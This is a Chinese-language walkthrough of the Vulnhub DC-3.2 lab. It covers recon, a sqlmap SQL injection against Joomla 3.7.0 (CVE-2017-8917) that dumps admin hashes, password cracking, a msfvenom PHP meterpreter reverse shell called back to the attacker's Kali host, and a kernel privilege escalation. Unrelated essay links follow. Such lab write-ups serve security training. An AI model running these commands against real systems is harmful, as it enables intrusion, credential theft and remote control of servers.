Vulnhub靶场----3、DC-3.2
创始人
2024-06-03 15:17:17
0

文章目录

  • 一、环境搭建
  • 二、渗透流程
  • 三、思路总结


一、环境搭建

靶场下载地址:https://download.vulnhub.com/dc/DC-3-2.zip
kali:192.168.144.148
DC-3.2:192.168.144.151

更改驱动器连接设置:


二、渗透流程

1、信息收集
nmap -T5 -sV -sT -p- -A 192.168.144.151


2、探测网站内容

1.访问192.168.144.151


2.web指纹扫描如下

网站使用joomla CMS,使用joomscan工具扫描
joomscan --url 192.168.144.151
点击了解👉joomscan扫描工具使用详解


3.漏洞获取

可用信息:获取到joomla版本3.7.0>寻找相关版本漏洞:searchsploit joomla 3.7.0 -w
搜索结果显示两个漏洞:
CVE-2015-8562 反序列化漏洞:https://www.exploit-db.com/exploits/43488
CVE-2017-8917 SQL注入漏洞:https://www.exploit-db.com/exploits/42033


CVE-2015-8562 反序列化漏洞
CVE-2017-8917 SQL注入漏洞


3、 CVE-2017-8917 SQL注入漏洞利用

exploits-db数据库记录了详细的利用过程,如下:


1.获取数据库

sqlmap -u "http://192.168.144.151/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]


2.joomladb数据库的表

sqlmap -u "http://192.168.144.151/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables


3.“#__users” 表的字段

sqlmap -u "http://192.168.144.151/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C name,password --dump 


4.密码解密

password采用bcrypt加密
👉bcrypt加密算法详解
使用john破解密码:snoopy
vi创建dc-3.2,将密码保存到dc-3.2
john爆破密码 john dc-3.2 --show 密码为:snoopy


5.进入后台

admin:snoopy登陆后台地址:http://192.168.144.151/administrator


4、获取权限


1.生成反弹shell
将shell内容复制到刚创建的dc.php文件中

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.144.148 LPORT=4444 > dc.php


2.kali开启监听:

use exploit/multi/handler
set payload /php/meterpreter/reverse_tcp
set LHOST 192.168.144.148
set LPORT 4444
run


3.访问webshell地址
http://192.168.144.151/templates/protostar/dc.php


4.获取临时shell

shell  #获取临时shell 
python -c 'import pty;pty.spawn("/bin/bash")'    #交互式shell

5、提权


1.获取服务器版本

uname -a
lsb_release -a


2.ubuntu 16.04 相关漏洞

searchsploit ubuntu 16.04 


3.下载提权exp

cat /usr/share/exploitdb/exploits/linux/local/39772.txt  


4.通过蚁剑将exploit.tar上传至脚本所在目录
在这里插入图片描述

5.解压exploit.tar
在这里插入图片描述

6.获取root权限
在这里插入图片描述


三、思路总结

1、只开放80端口的情况下,网站指纹、目录扫描等方向
2、通过网站CMS版本信息搜索相关版本漏洞
3、利用版本SQL注入漏洞获取后台登录账号密码
4、后台寻找webshell插入地址
5、获取shell,寻找服务器版本漏洞
6、利用服务器版本漏洞提权

参考链接:https://blog.mzfr.me/vulnhub-writeups/2019-07-12-DC3

相关内容

热门资讯

我的英语老师-老师的作文60... 我的英语老师-老师的作文600字 篇一我的英语老师我非常幸运地遇到了一位优秀的英语老师,她是我人生中...
高中英语作文(经典6篇) 高中英语作文 篇一:如何提高英语口语能力英语是一门国际通用语言,具备良好的英语口语能力对于我们的学习...
学英语作文【实用6篇】 学英语作文 篇一如何提高英语口语能力英语口语是学习英语的重要组成部分,也是很多人学习英语的目标之一。...
植树节的英语作文【推荐6篇】 植树节的英语作文 篇一The Importance of Tree-Planting on Arbo...
网络的利与弊英语作文 关于网络的利与弊英语作文  在日常学习、工作和生活中,说到作文,大家肯定都不陌生吧,作文是人们把记忆...
英语作文 高分范文初三51篇... 英语作文 高分范文初三51篇 篇一Title: The Importance of Reading ...
06年专升本英语作文范文(通... 06年专升本英语作文范文 篇一How to Maintain a Healthy Lifestyle...
代沟的英语作文(优选3篇) 代沟的英语作文 篇一Generation GapIn today's fast-paced soci...
《伟大的盖茨比》英文读后感(... 《伟大的盖茨比》英文读后感 篇一"The Great Gatsby" is a masterpiec...
体育锻炼英语作文(精简6篇) 体育锻炼英语作文 篇一:身体健康与体育锻炼体育锻炼在我们的生活中扮演着重要的角色,对我们的身心健康有...
长城英语作文【优质6篇】 长城英语作文 篇一The Great Wall of China: A Symbol of Unit...
英文请假条(实用6篇) 英文请假条 篇一Subject: Leave of Absence RequestDear [Rec...
考研英语作文格式落款范文(推... 考研英语作文格式落款范文 篇一标题:The Impact of Social Media on In...
介绍杭州的英语作文(通用3篇... Introduction to HangzhouArticle One: The Beauty of...
竞争的好处英语作文(精彩5篇... Competition: The Benefits (Essay 1)Competition is ...
中华文化的传承英语作文及翻译... 中华文化的传承英语作文及翻译 篇一Title: The Inheritance of Chinese...
我的家庭作文英语80词【精彩... My Family - Article 1My family is very important t...
小学六年级优秀英语作文【优选... 小学六年级优秀英语作文 篇一:My Favorite HobbyMy Favorite HobbyO...
毕业旅行的英文作文(实用6篇... 毕业旅行的英文作文 篇一Title: An Unforgettable Graduation Tri...
考研英语作文备考10大(优选... 考研英语作文备考10大篇一第一篇内容:提高写作水平的5个技巧考研英语作文备考是每个考生必经的一道难关...